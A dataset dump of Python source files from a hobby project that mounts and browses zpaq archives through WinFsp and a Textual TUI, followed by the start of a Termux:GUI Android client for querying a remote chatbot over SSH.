"total_size": max_file_nodes * max_file_size,
"free_size": 0, #(max_file_nodes - file_nodes) * max_file_size,
"volume_label": volume_label,
}
self.input_file = input_file
self.max_cache_size = max_cache_size
self.config = config
self.cache_location = os.path.abspath(cache_location)
self.read_only = read_only
self._root_path = PureWindowsPath("/")
self._root_obj = FolderObj(
self._root_path,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY,
SecurityDescriptor.from_string("O:BAG:BAD:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;WD)"), None
)
self._entries = {self._root_path: self._root_obj}
self._thread_lock = threading.Lock()
# Debugging helpers
def _create_directory(self, path, file_data):
path = self._root_path / path
obj = FolderObj(
path,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY,
self._root_obj.security_descriptor,
file_data
)
self._entries[path] = obj
def _import_files(self, file_path, file_data):
file_path = Path(file_path)
path = self._root_path / file_path.name
obj = FileObj(
path,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_ARCHIVE,
file_data,
self._root_obj.security_descriptor,
)
self._entries[path] = obj
obj.write(file_path.read_bytes(), 0, False)
# Winfsp operations
@operation
def get_volume_info(self):
return self._volume_info
@operation
def set_volume_label(self, volume_label):
self._volume_info["volume_label"] = volume_label
@operation
def get_security_by_name(self, file_name):
file_name = PureWindowsPath(file_name)
# Retrieve file
try:
file_obj = self._entries[file_name]
except KeyError:
raise NTStatusObjectNameNotFound()
return (
file_obj.attributes,
file_obj.security_descriptor.handle,
file_obj.security_descriptor.size,
)
@operation
def create(
self,
file_name,
create_options,
granted_access,
file_attributes,
security_descriptor,
allocation_size,
file_data,
):
if self.read_only:
raise NTStatusMediaWriteProtected()
file_name = PureWindowsPath(file_name)
# `granted_access` is already handle by winfsp
# `allocation_size` useless for us
# Retrieve file
try:
parent_file_obj = self._entries[file_name.parent]
if isinstance(parent_file_obj, FileObj):
raise NTStatusNotADirectory()
except KeyError:
raise NTStatusObjectNameNotFound()
# File/Folder already exists
if file_name in self._entries:
raise NTStatusObjectNameCollision()
if create_options & CREATE_FILE_CREATE_OPTIONS.FILE_DIRECTORY_FILE:
file_obj = self._entries[file_name] = FolderObj(
file_name, file_attributes, security_descriptor, file_data
)
else:
file_obj = self._entries[file_name] = FileObj(
file_name,
file_attributes,
security_descriptor,
file_data,
allocation_size,
)
return OpenedObj(file_obj)
@operation
def get_security(self, file_context):
return file_context.file_obj.security_descriptor
@operation
def set_security(self, file_context, security_information, modification_descriptor):
raise NotImplementedError()
@operation
def rename(self, file_context, file_name, new_file_name, replace_if_exists):
raise NotImplementedError()
@operation
def open(self, file_name, create_options, granted_access):
file_name = PureWindowsPath(file_name)
# `granted_access` is already handle by winfsp
# Retrieve file
try:
file_obj = self._entries[file_name]
except KeyError:
raise NTStatusObjectNameNotFound()
return OpenedObj(file_obj)
@operation
def close(self, file_context):
pass
@operation
def get_file_info(self, file_context):
return file_context.file_obj.get_file_info()
@operation
def set_basic_info(
self,
file_context,
file_attributes,
creation_time,
last_access_time,
last_write_time,
change_time,
file_info,
) -> dict:
if self.read_only:
raise NTStatusMediaWriteProtected()
file_obj = file_context.file_obj
if file_attributes != FILE_ATTRIBUTE.INVALID_FILE_ATTRIBUTES:
file_obj.attributes = file_attributes
if creation_time:
file_obj.creation_time = creation_time
if last_access_time:
file_obj.last_access_time = last_access_time
if last_write_time:
file_obj.last_write_time = last_write_time
if change_time:
file_obj.change_time = change_time
return file_obj.get_file_info()
@operation
def set_file_size(self, file_context, new_size, set_allocation_size):
if self.read_only:
raise NTStatusMediaWriteProtected()
if set_allocation_size:
file_context.file_obj.set_allocation_size(new_size)
else:
file_context.file_obj.set_file_size(new_size)
@operation
def can_delete(self, file_context, file_name: str) -> None:
raise NotImplementedError()
@operation
def read_directory(self, file_context, marker):
entries = []
file_obj = file_context.file_obj
# Not a directory
if isinstance(file_obj, FileObj):
raise NTStatusNotADirectory()
# The "." and ".." should ONLY be included if the queried directory is not root
if file_obj.path != self._root_path:
parent_obj = self._entries[file_obj.path.parent]
entries.append({"file_name": ".", **file_obj.get_file_info()})
entries.append({"file_name": "..", **parent_obj.get_file_info()})
# Loop over all entries
for entry_path, entry_obj in self._entries.items():
try:
relative = entry_path.relative_to(file_obj.path)
# Filter out unrelated entries
except ValueError:
continue
# Filter out ourself or our grandchildren
if len(relative.parts) != 1:
continue
# Add direct chidren to the entry list
entries.append({"file_name": entry_path.name, **entry_obj.get_file_info()})
# Sort the entries
entries = sorted(entries, key=lambda x: x["file_name"])
# No filtering to apply
if marker is None:
return entries
# Filter out all results before the marker
for i, entry in enumerate(entries):
if entry["file_name"] == marker:
return entries[i + 1 :]
@operation
def get_dir_info_by_name(self, file_context, file_name):
path = file_context.file_obj.path / file_name
try:
entry_obj = self._entries[path]
except KeyError:
raise NTStatusObjectNameNotFound()
return {"file_name": file_name, **entry_obj.get_file_info()}
# @operation
# def read(self, file_context, offset, length):
# if len(file_context.file_obj.data) == 0:
# ex_file = None
# if file_context.file_obj.file_size < self.max_cache_size: # 30 MB deafult
# ex_file = ztv.extract_file(self.config, self.input_file, file_context.file_obj.file_data.fullPath,
# self.cache_location, file_context.file_obj.file_data.is_directory())
# if ex_file is not None:
# with open(ex_file, 'rb') as f:
# file_context.file_obj.data = bytearray(f.read())
#
# end_offset = min(file_context.file_obj.file_size, offset + length)
# return file_context.file_obj.data[offset:end_offset]
# else:
# file_context.file_obj.data = bytearray(1)
# return file_context.file_obj.data
#
# if len(file_context.file_obj.data) > 1:
# end_offset = min(file_context.file_obj.file_size, offset + length)
# return file_context.file_obj.data[offset:end_offset]
#
# return bytearray(1)
@operation
def read(self, file_context, offset, length):
if len(file_context.file_obj.data) == 0:
if file_context.file_obj.file_size < self.max_cache_size: # 30MB default
file_context.file_obj.data = bytearray(
ztv.read_file(self.config, self.input_file, file_context.file_obj.file_data.fullPath))
else:
file_context.file_obj.data = bytearray(1)
return file_context.file_obj.data[offset:offset + length]
@operation
def write(self, file_context, buffer, offset, write_to_end_of_file, constrained_io):
raise NotImplementedError()
@operation
def cleanup(self, file_context, file_name, flags) -> None:
raise NotImplementedError()
@operation
def overwrite(
self, file_context, file_attributes, replace_file_attributes: bool, allocation_size: int
) -> None:
raise NotImplementedError()
@operation
def flush(self, file_context) -> None:
pass
def create_memory_file_system(
mountpoint, label="memfs", prefix="", verbose=True, debug=False, testing=False,
input_file="", cache_location="%userprofile%/AppData/Local/", max_cache_size = 30 * 10**6 , config=None):
if debug:
enable_debug_log()
if verbose:
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
# The avast workaround is not necessary with drives
# Also, it is not compatible with winfsp-tests
mountpoint = Path(mountpoint)
is_drive = mountpoint.parent == mountpoint
reject_irp_prior_to_transact0 = not is_drive and not testing
operations = ZpaqFileSystemOperations(label, input_file, cache_location, max_cache_size, config)
fs = FileSystem(
str(mountpoint),
operations,
sector_size=512,
sectors_per_allocation_unit=1,
volume_creation_time=filetime_now(),
volume_serial_number=0,
file_info_timeout=1000,
case_sensitive_search=1,
case_preserved_names=1,
unicode_on_disk=1,
persistent_acls=1,
post_cleanup_when_modified_only=1,
um_file_context_is_user_context2=1,
file_system_name=str(mountpoint),
prefix=prefix,
debug=debug,
reject_irp_prior_to_transact0=reject_irp_prior_to_transact0,
# security_timeout_valid=1,
# security_timeout=10000,
)
return fs
def convert_filetree(config, file_path, fs):
tl_tree = ztv.main(config, file_path)
tl_node_stack = [tl_tree.get_node(tl_tree.root)]
new_path = tl_tree.get_node(tl_tree.root).data.fullPath.replace(tl_tree.root, fs.mountpoint) + "/"
print("In convert before first create.")
# fs_root = fs.operations.create(new_path, CREATE_FILE_CREATE_OPTIONS.FILE_DIRECTORY_FILE, None,
# FILE_ATTRIBUTE.FILE_ATTRIBUTE_DIRECTORY, None, 0, tl_tree.get_node(tl_tree.root).data)
# fs_stack = [fs_root]
# fs_root = fs.operations._create_directory(new_path, tl_tree.get_node(tl_tree.root).data)
print("Converting file tree to winfspy structure...")
bar = tqdm(total=tl_tree.size(), unit="nodes", colour="green", leave=False)
c1 = 0
while len(tl_node_stack) > 0:
tl_node = tl_node_stack.pop()
# fs_node = fs_stack.pop()
#children_sorted = tl_tree.children(tl_node.tag)
#children_sorted.sort(key=lambda x: (x.is_leaf(), x.data.name.lower())) # TODO: check if necessary to sort
if (tl_node.data.is_directory()):
for tl_child_node in tl_tree.children(tl_node.tag): # children_sorted:
new_path = tl_child_node.data.fullPath.replace(tl_tree.root, "")
if (tl_child_node.data.is_directory()): # is directory
tl_node_stack.append(tl_child_node)
fs.operations._create_directory(new_path, tl_child_node.data)
else: # is file
fileobj = fs.operations.create(new_path, CREATE_FILE_CREATE_OPTIONS.FILE_NON_DIRECTORY_FILE, None,
FILE_ATTRIBUTE.FILE_ATTRIBUTE_NORMAL, fs.operations._root_obj.security_descriptor, 0, tl_child_node.data)
fileobj.file_obj.file_size = tl_child_node.data.size
bar.update()
bar.close()
def create_filesystem(mountpoint, label, prefix, verbose, debug, input_file, cache_location, max_cache_size):
config = ztv.load_create_config()
print(f"Input file: {input_file}")
fs = create_memory_file_system(mountpoint, label, prefix, verbose, debug, True,
input_file, cache_location, max_cache_size, config,)
try:
print("Starting FS")
fs.start()
print("FS started, keep it running forever")
# while True:
# result = input("Set read-only flag (y/n/q)? ").lower()
# if result == "y":
# fs.operations.read_only = True
# fs.restart(read_only_volume=True)
# elif result == "n":
# fs.operations.read_only = False
# fs.restart(read_only_volume=False)
# elif result == "q":
# break
print(f"Input file: {fs.operations.input_file}")
convert_filetree(config, fs.operations.input_file, fs)
fs.read_only = True
fs.restart(read_only_volume=True)
input("press enter to exit")
finally:
print("Stopping FS")
fs.stop()
print("FS stopped")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("mountpoint")
parser.add_argument("-z", "--zpaq", type=str, default=None)
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-d", "--debug", action="store_true")
parser.add_argument("-l", "--label", type=str, default="memfs")
parser.add_argument("-p", "--prefix", type=str, default="")
parser.add_argument("-c", "--cache-location", type=str, default=(os.environ["USERPROFILE"] + "/AppData/local/temp"))
parser.add_argument("-s", "--cache-size-limit", type=int, default=30 * 10**6) # 30 MB
args = parser.parse_args()
if args.zpaq is None:
input_file = None
while input_file is None:
input_file = filedialog.askopenfilename(initialdir=getcwd(), title="Select a zpaq file")
args.zpaq = input_file
create_filesystem(args.mountpoint, args.label, args.prefix, args.verbose,
args.debug, args.zpaq, args.cache_location, args.cache_size_limit)
if __name__ == "__main__":
main() | 20,848 | Python | .py | 497 | 33.350101 | 129 | 0.617098 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,558 | zpaqtreeview.py | EpicGazel_ZpaqTreeView/zpaqtreeview.py | import configparser
from treelib import Tree
import re
from subprocess import check_output, Popen, PIPE, CalledProcessError
import tqdm
from sys import stderr
from platform import system
import traceback
class File:
def __init__(self, full_path, size, last_modified, attribute):
self.fullPath = full_path.rstrip("/")
self.size = size if type(size) is int else int(size.replace(".", ""))
self.lastModified = last_modified
self.attribute = attribute
if full_path[-1] != "/": # not a folder
self.name = full_path.split("/")[-1]
else:
self.name = full_path.split("/")[-2]
def __str__(self):
return f"{self.lastModified}\t{self.size:>14} {self.attribute:10}\t {self.fullPath}"
def is_directory(self):
return "D" in self.attribute
def build_parent_nodes(tree: Tree, path: str):
parent_path = '/'.join(path.split('/')[0:-1])
# TODO: verify works with non-windows drive root dir/linux directories
if parent_path.find('/') == -1:
if not tree.get_node(parent_path): # parent is root
data = File(parent_path, 0, 0, "D")
tree.create_node(parent_path, parent_path, data=data)
return parent_path
elif not tree.get_node(parent_path):
build_parent_nodes(tree, parent_path)
data = File(parent_path, 0, 0, "D")
tree.create_node(parent_path, parent_path, parent=build_parent_nodes(tree, parent_path), data=data)
return parent_path
def add_node_new(tree: Tree, node: File):
build_parent_nodes(tree, node.fullPath)
if tree.get_node(node.fullPath):
tree.get_node(node.fullPath).data = node
return
parent_path = node.fullPath[0:-(len(node.name) + 1)]
tree.create_node(node.fullPath, node.fullPath, parent=parent_path, data=node)
return
def create_filetree(tree: Tree, contents):
pattern = re.compile(
r"-\s(?P<daytime>[0-9]{4}-[0-9]{2}-[0-9]{2}\s[0-9]{2}:[0-9]{2}:[0-9]{2})\s+"
r"(?P<size>[0-9]+(\.[0-9]+)*)\s+(?P<attribute>[A-Za-z0-9]+)\s+(?P<path>.*)")
num_files_pattern = re.compile(r"([0-9]+(\.[0-9])*)+\sfiles")
# Find number of files for estimate (this appears to be off because of the versions?)
num_files = 1000
# for line in contents:
# num_files -= 1
# match = re.search(num_files_pattern, line)
# if match:
# temp = match.group()
# num_files = int(temp[0:temp.find(" files")].replace(".", ""))
# break
# elif line.find("ERROR_FILE_NOT_FOUND") != -1:
# print("ZPAQ file not found.", file=stderr)
# exit(1)
# elif line.find("Usage") != -1:
# print("ZPAQ path may have been entered improperly.", file=stderr)
# exit(1)
print("Creating file tree...")
bar = tqdm.tqdm(contents, total=num_files, unit="files", colour="green", leave=False)
for line in bar:
try:
if "," in line and "-csv" not in line:
line = line.rstrip()
#date, _, __, attribute, fullpath = re.search(pattern, line).groups()
#size = re.search(pattern, line).group("size")
datetime, attribute, size, ratio, _, fullpath = line.split(",")
date = datetime.split(" ")[0]
date = date.strip("'")
attribute = attribute.strip("'")
size = size.strip("'")
ratio = ratio.strip("'")
fullpath = fullpath.strip("'")
testfile = File(fullpath, size, date, attribute)
add_node_new(tree, testfile)
else:
# num_files -= 1
# bar.total = num_files
# bar.refresh()
pass
except IndexError: # sometimes line[0] is invalid
pass
# Ideally would update bar total here instead of just closing and hiding it with leave=False
bar.close()
def extract_file(config, zpaq_file, extract_from_path, extract_to_path, is_directory=False):
if is_directory: #len(tree.children(node)) != 0: # assumes all folders have 0 children
# must include trailing /
if extract_to_path[-1] != "/":
extract_to_path += "/"
if extract_from_path[-1] != "/":
extract_from_path += "/"
if system() == "Windows":
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path, "-longpath",
"-find", extract_from_path]
else:
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path]
else: # is file or empty directory
if system() == "Windows":
if extract_to_path[-1] == "/": # must drop trailing /
extract_to_path = extract_to_path[:-1]
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path, "-longpath",
"-find", '/'.join(extract_from_path.split('/')[:-1]) + "/"]
if extract_to_path[-1] == ":": # when extracting to directory root, -space is required for some reason
command.append("-space")
else:
# must include trailing /
if extract_from_path[-1] == "/":
extract_to_path += extract_from_path.split("/")[-2]
else:
extract_to_path += extract_from_path.split("/")[-1]
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-to", extract_to_path]
print(f"Command: {command}")
try:
print(check_output(command).decode("utf-8"))
except Exception as e: # CalledProcessError as e:
print(f"Something went wrong with extracting. Error: {traceback.format_exc()}")
return extract_to_path + "/" + extract_from_path.split("/")[-1]
def read_file(config, zpaq_file, extract_from_path):
try:
command = [config.get('config', 'zpaq_path'), "x", zpaq_file, extract_from_path, "-longpath", "-stdout"]
print(f"Command: {command}")
return check_output(command)
except Exception as e: # CalledProcessError as e:
print(f"Something went wrong with extracting. Error: {traceback.format_exc()}")
def explore_tree(tree: Tree, config, zpaq_file: str = None):
user_input = "0"
curr_node = tree.root
while user_input != 'q' and user_input != 'Q':
print(f"Current node: {curr_node}")
if not tree.get_node(curr_node).data.is_directory():
print("Is file.")
print("Enter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
elif len(tree.children(curr_node)) == 0:
print("Directory empty.")
print("Enter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
else:
for index, node in enumerate(tree.children(curr_node)):
print(f"{index + 1:>4}: {node.data}")
print("Enter a node number to explore it.\nEnter .. to go back a directory. Enter root to go back to "
"root.\nEnter s to save tree to file.\nEnter x to extract file/directory.\nEnter q to quit")
user_input = input()
if user_input == 'q' or user_input == 'Q':
break
elif user_input == 's':
file_type = input("Enter text or json: ")
path = input("Enter path: ")
try:
if file_type == "text":
tree.save2file(path)
elif file_type == "json":
open(path, 'w').write(tree.to_json())
else:
print("Invalid file type selected.")
except Exception as e: # FileNotFoundError, OSError Invalid argument,
print(f"Something went wrong with the file path. Error: {traceback.format_exc()}", file=stderr)
continue
elif user_input.isnumeric() and 0 < int(user_input) <= len(tree.children(curr_node)):
curr_node = tree.children(curr_node)[int(user_input) - 1].identifier
continue
elif user_input == '..':
if tree.parent(curr_node) is not None:
curr_node = tree.parent(curr_node).identifier
else:
print("Already at root.")
continue
elif user_input == 'root':
curr_node = tree.root
continue
elif user_input == 'x':
if zpaq_file is None:
zpaq_file = input("Please specify path to zpaq file: ")
extract_path = input("Enter extract path (not including file/directory name): ").replace("\\", "/")
node = tree.get_node(curr_node)
extract_file(config, zpaq_file, node.data.fullPath, extract_path, not node.is_leaf())
else:
print("Invalid input. Please try again.")
continue
def load_create_config():
config = configparser.ConfigParser()
config.read('config.ini')
needToWrite = False
if not config.has_section('config'):
config.add_section('config')
needToWrite = True
if not config.has_option('config', 'zpaq_path'):
try:
check_output(["zpaqfranz"])
config.set('config', 'zpaq_path', 'zpaqfranz')
print("zpaqfranz found.")
except CalledProcessError:
zpaq_path = input("Enter zpaqfranz path (no quotes): ")
# retry until valid
valid_path = False
while not valid_path:
try:
check_output([zpaq_path])
valid_path = True
except CalledProcessError:
zpaq_path = input("Path was invalid, please try again. Enter zpaqfranz path (no quotes): ")
config.set('config', 'zpaq_path', zpaq_path)
needToWrite = True
if config.has_option('config', 'zpaq_path'):
valid_path = False
while not valid_path:
try:
check_output([config.get('config', 'zpaq_path')])
valid_path = True
needToWrite = True
except Exception as e:
print(f"Something went wrong with zpaqfranz.\nError: {e.with_traceback()}", file=stderr)
zpaq_path = input("Path was invalid, please try again. Enter zpaqfranz path (no quotes): ")
config.set('config', 'zpaq_path', zpaq_path)
if needToWrite:
with open('config.ini', 'w') as configfile:
config.write(configfile)
return config
def linux_tests():
# zpaqfranz x "/mnt/b/g_drive.zpaq" "G:/.minecraft/screenshots/2019-05-09_21.57.51.png" -to "/mnt/b/tempout/2019-05-09_21.57.51.png"
print(check_output(["zpaqfranz", "x", "/mnt/b/g_drive.zpaq", "G:/.minecraft/screenshots/2019-05-09_21.57.51.png", "-to", "/mnt/b/tempout/2019-05-09_21.57.51.png"]).decode("utf-8"))
def main(config=None, file_path=None):
if config is None:
config = load_create_config()
if file_path is None:
file_path = input("Enter file path to load: ")
ext = file_path.split('.')[-1]
zpaqpath = config.get('config', 'zpaq_path')
zpaq_file = None
try:
if ext == 'zpaq':
contents = Popen([zpaqpath, "l", file_path, "-longpath", "-terse", "-csv", "','"], stdout=PIPE, encoding="utf-8",
errors="ignore").stdout
zpaq_file = file_path
elif ext == 'txt':
contents = open(file_path, 'r', encoding="utf-8")
else:
print("Invalid file type.", file=stderr)
exit(1)
except Exception as e:
print(f"Something went wrong getting the file list. Error: {traceback.format_exc()}", file=stderr)
exit(1)
tree = Tree()
try:
create_filetree(tree, contents)
except Exception as e:
print(f"Something went wrong creating the file tree. Error: {traceback.format_exc()}", file=stderr)
if ext == 'txt':
contents.close()
exit(1)
if ext == 'txt':
contents.close()
if __name__ == "__main__":
try:
explore_tree(tree, config, zpaq_file)
except Exception as e:
print(f"Something went wrong exploring the file tree. Error: {traceback.format_exc()}", file=stderr)
exit(1)
else:
return tree
if __name__ == "__main__":
main()
| 12,704 | Python | .py | 267 | 37.445693 | 184 | 0.571763 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,559 | tree_tui.py | EpicGazel_ZpaqTreeView/tree_tui.py | """
Code browser example.
Run with:
python code_browser.py PATH
"""
from sys import argv
from os import getcwd
from textual.app import App, ComposeResult
from textual.containers import Container
from textual.reactive import var
from textual.widgets import Tree, Footer, Header, Input
from tqdm import tqdm
from tkinter import filedialog
import zpaqtreeview as ztv
def convert_filetree(config=None, file_path=None):
tl_tree = ztv.main(config, file_path)
tx_tree = Tree(label=tl_tree.root, data=tl_tree.get_node(tl_tree.root).data)
tl_node_stack = [tl_tree.get_node(tl_tree.root)]
tx_stack = [tx_tree.root]
print("Converting file tree to textual...")
bar = tqdm(total=tl_tree.size(), unit="nodes", colour="green", leave=False)
while len(tl_node_stack) > 0:
tl_node = tl_node_stack.pop()
tx_node = tx_stack.pop()
children_sorted = tl_tree.children(tl_node.tag)
children_sorted.sort(key=lambda x: (x.is_leaf(), x.data.name.lower()))
for tl_child_node in children_sorted:
if tl_child_node.data.is_directory(): # not tl_child_node.is_leaf(): # If directory, true
tl_node_stack.append(tl_child_node)
tx_stack.append(
tx_node.add(tl_child_node.data.name, data=tl_child_node.data))
else:
tx_node.add_leaf(tl_child_node.data.name, data=tl_child_node.data)
bar.update()
bar.close()
return tx_tree
class TreeTUI(App):
"""Tree view of zpaqfranz archive."""
CSS_PATH = "tree_tui.tcss"
BINDINGS = [
("f", "toggle_files", "Toggle Files"),
("x", "extract_menu", "Extract"),
("q", "quit", "Quit"),
] # TODO: f = find, x = extract, s = save, q = quit, i = file info, maybe something about file selection?
show_tree = var(True)
show_file_input = var(False)
current_node = var(None)
def watch_show_tree(self, show_tree: bool) -> None:
"""Called when show_tree is modified."""
self.set_class(show_tree, "-show-tree")
if show_tree:
self.query_one(Tree).focus()
def watch_show_file_input(self, show_file_input: bool) -> None:
"""Called when show_file_input is modified."""
if show_file_input:
self.query_one(Input).focus()
def compose(self) -> ComposeResult:
"""Compose our UI."""
path = "./" if len(argv) < 2 else argv[1]
yield Header()
yield Input(id="file-input", classes="hidden")
with Container():
yield tree
yield Footer()
def on_mount(self) -> None:
self.query_one(Tree).focus()
def action_extract_menu(self) -> None:
out_directory = filedialog.askdirectory(initialdir=getcwd(), mustexist=True, title="Select output directory")
ztv.extract_file(config, input_file, self.current_node.data.fullPath, out_directory, self.current_node.data.is_directory())
# TODO: Toast notification of extraction result
def action_toggle_files(self) -> None:
"""Called in response to key binding."""
self.show_tree = not self.show_tree
def on_tree_node_highlighted(self, event: Tree.NodeHighlighted) -> None:
self.current_node = event.node
if __name__ == "__main__":
config = ztv.load_create_config()
if len(argv) == 1:
input_file = None
while input_file is None:
input_file = filedialog.askopenfilename(initialdir=getcwd(), title="Select a zpaq file",)
elif len(argv) == 2:
input_file = argv[1]
else:
print("Too many arguments.", file=stderr)
exit(1)
tree = convert_filetree(config, input_file)
TreeTUI().run()
| 3,720 | Python | .py | 88 | 35.113636 | 131 | 0.635457 | EpicGazel/ZpaqTreeView | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,560 | AndroidRemoteGPT.py | compilebunny_androidremoteGPT/AndroidRemoteGPT.py | # AndroidRemoteGPT by Jonathan Germain
# Available at https://github.com/compilebunny/androidremoteGPT
# Licensed under version 3 of the GNU General Public License
import os
import time
import json
import re
from subprocess import Popen, PIPE
import sys
try:
import termuxgui as tg
except ModuleNotFoundError:
sys.exit("termuxgui module not found. Please install the Termux:GUI python bindings as described in the tutorial")
def closeconnection(connex):
connex.close()
def ReadConfigFromDisk(cfname):
configfile = open(os.path.expanduser(cfname), "r")
configinfo = configfile.readlines()
print (f"read {len(configinfo)} lines")
# remove all comments flagged with '#' and all whitespace before '='
for i in range(len(configinfo)):
if ('=' in configinfo[i]): configinfo[i]=re.sub(r' +=', '=', configinfo[i])
if ('#' in configinfo[i]): configinfo[i]=configinfo[i][:configinfo[i].index('#')]
# remove whitespace at beginning and end of line and all config commands fewer than 3 non-whitespace characters long
configinfo=list(map(str.rstrip, configinfo))
configinfo=list(map(str.lstrip, configinfo))
configinfo = [line for line in configinfo if len(line)>3]
# Convert the array into a dict structure; keys are made lowercase automatically
infopackage = {'server':'', 'port': '22', 'user':'', 'password':'', 'sequence':'', 'logfile':'', 'next_cmd_indicator':'⇢'}
for i in range(len(configinfo)):
if ('=' in configinfo[i]): infopackage[str.lower(configinfo[i].split('=')[0])] = configinfo[i].split('=')[1]
return infopackage
def WriteConfigToDisk(cfdata):
with open(os.path.expanduser(configfilename), "w") as f:
for k in cfdata.keys():
f.write("{}={}\n".format(k,cfdata[k]))
f.close()
def ConfigPageTextObject(activity,layout,text,size):
output = tg.TextView(activity, text, layout)
output.setlinearlayoutparams(0)
output.settextsize(size)
output.setheight(tg.View.WRAP_CONTENT)
return output
def MainPageTextObject(activity,layout,text,size):
output = tg.TextView(activity, text, layout)
output.setlinearlayoutparams(0)
output.settextsize(size)
output.setheight(tg.View.WRAP_CONTENT)
return output
def ConfigPageEditBox(activity,layout,text,size):
output = tg.EditText(activity, text, layout)
output.setlinearlayoutparams(0)
output.setdimensions("wrap_content", size)
output.setheight(tg.View.WRAP_CONTENT)
output.sendtextevent(True)
return output
def MainPageEditBox(activity,layout,text,size):
output = tg.EditText(activity, text, layout)
output.setlinearlayoutparams(0)
output.setdimensions("wrap_content", size)
output.setheight(tg.View.WRAP_CONTENT)
output.sendtextevent(True)
return output
def doConfigPage(connection):
# create a new Activity for the config screen. By default, a new Task as created under configactivity.t
configactivity = tg.Activity(connection,canceloutside=False)
# Create a layout for the config screen
configlayout = tg.LinearLayout(configactivity)
# create a TextView page title
title = tg.TextView(configactivity, "Configuration",configlayout)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
# create entry points for all necessary config data
recommendation_message = ConfigPageTextObject(configactivity, configlayout,"For security, passwords are disallowed. Please set up key-based authentication in ~/.ssh/config.",12)
serverask = ConfigPageTextObject(configactivity, configlayout,"host (server name or as defined in .ssh/config)",12)
getservername = ConfigPageEditBox(configactivity, configlayout, configdata['server'],60)
portask = ConfigPageTextObject(configactivity, configlayout,"port number (default: 22)",12)
# the port number requires special treatment because it should allow numbers only
getportnum = tg.EditText(configactivity, configdata['port'], configlayout, inputtype='number')
getportnum.setlinearlayoutparams(0)
getportnum.setdimensions("wrap_content", 10)
getportnum.setheight(tg.View.WRAP_CONTENT)
getportnum.sendtextevent(True)
userask = ConfigPageTextObject(configactivity, configlayout,"user",12)
getusername = ConfigPageEditBox(configactivity, configlayout, configdata['user'],60)
# passask = ConfigPageTextObject(configactivity, configlayout,"password (leave blank if using an ssh key)",12)
# getpassword = ConfigPageEditBox(configactivity, configlayout, configdata['password'],60)
nextask = ConfigPageTextObject(configactivity, configlayout,"next command indicator - important - tells the interface when the bot response is complete and the system is ready for a new query",12)
getnextcmd = ConfigPageEditBox(configactivity, configlayout, configdata['next_cmd_indicator'],1)
sequenceask = ConfigPageTextObject(configactivity, configlayout,"setup sequence: commands to execute after logging in. Separate multiple unix shell commands with semicolons.",12)
getsequence = ConfigPageEditBox(configactivity, configlayout, configdata['sequence'],60)
logfileask = ConfigPageTextObject(configactivity, configlayout,"logfile name",12)
getlogfile = ConfigPageEditBox(configactivity, configlayout, configdata['logfile'],60)
buttons = tg.LinearLayout(configactivity, configlayout, False)
buttons.setlinearlayoutparams(0)
savebutton = tg.Button(configactivity, "save", buttons)
cancelbutton = tg.Button(configactivity, "cancel", buttons)
for eventmanager in connection.events():
if eventmanager.type == tg.Event.destroy and eventmanager.value["finishing"]:
print (f"exiting config screen: {configdata}")
configactivity.finish()
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == savebutton:
configdata["server"] = getservername.gettext()
configdata["port"] = getportnum.gettext()
configdata["user"] = getusername.gettext()
# configdata["password"] = getpassword.gettext()
configdata["sequence"] = getsequence.gettext()
configdata["logfile"] = getlogfile.gettext()
configdata["next_cmd_indicator"] = getnextcmd.gettext()
WriteConfigToDisk(configdata)
if eventmanager.type == tg.Event.click and eventmanager.value["id"] == cancelbutton:
configactivity.finish()
# doMainPage(connection)
tg.Event.destroy
print (f"exiting config screen: {configdata}")
return
# Finished with doConfigPage
def doMainPage(connection):
mainscreen = tg.Activity(connection,canceloutside=False)
latestcommand = "blank"
lastresponse = "no response yet"
speakstate=False
logstate=False
# Create a set of layouts
first_layout = tg.LinearLayout(mainscreen)
horizdivide = tg.LinearLayout(mainscreen, first_layout, False)
query_side = tg.LinearLayout(mainscreen, horizdivide)
control_side = tg.LinearLayout(mainscreen, horizdivide)
# control_side.setwidth(80)
# create a TextView page title for the query/response side of the screen
title = tg.TextView(mainscreen, "Query/Response",query_side)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
nextcommand = MainPageEditBox(mainscreen,query_side,latestcommand,12)
response = MainPageTextObject(mainscreen,query_side,"no response yet",12)
requestbutton = tg.Button(mainscreen, "request", query_side)
requestbutton.setlinearlayoutparams(0)
requestbutton.setheight(tg.View.WRAP_CONTENT)
# create a TextView page title for the control side of the screen
title = tg.TextView(mainscreen, "Control", control_side)
title.setlinearlayoutparams(0)
title.settextsize(20)
title.setmargin(5)
configbutton = tg.Button(mainscreen, "configuration", control_side)
configbutton.setlinearlayoutparams(0)
configbutton.setheight(tg.View.WRAP_CONTENT)
connectbutton = tg.Button(mainscreen, "connect", control_side)
connectbutton.setlinearlayoutparams(0)
connectbutton.setheight(tg.View.WRAP_CONTENT)
disconnectbutton = tg.Button(mainscreen, "disconnect", control_side)
disconnectbutton.setlinearlayoutparams(0)
disconnectbutton.setheight(tg.View.WRAP_CONTENT)
speak = tg.Checkbox(mainscreen,"speak?",control_side,False)
speak.setlinearlayoutparams(0)
speak.setheight(tg.View.WRAP_CONTENT)
